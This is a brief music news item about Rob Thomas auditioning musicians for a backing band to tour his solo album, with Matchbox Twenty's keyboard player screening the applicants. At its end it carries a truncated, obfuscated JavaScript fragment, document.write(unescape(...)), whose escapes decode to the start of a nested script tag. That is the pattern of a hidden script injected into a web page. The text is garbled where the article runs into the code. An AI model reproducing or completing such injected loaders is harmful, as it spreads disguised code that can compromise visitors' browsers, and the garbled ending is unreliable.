Matchbox Twenty singer Rob Thomas is looking for a backing band to take his solo record on the road.
To help find the band, he's enlisted Matchbox Twenty's keyboard player to sort through them all. Thomas says his friend goes through "the first really bad 100 guitar players" and then sends Thomas five to check out. Thomas says he can't go through an "American Idol" process and it's not about how fast a player can play. He says it's about the drummer and the best player -- and him, of course. Thomas' solo album, "Something To Be," comes out April 19th.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
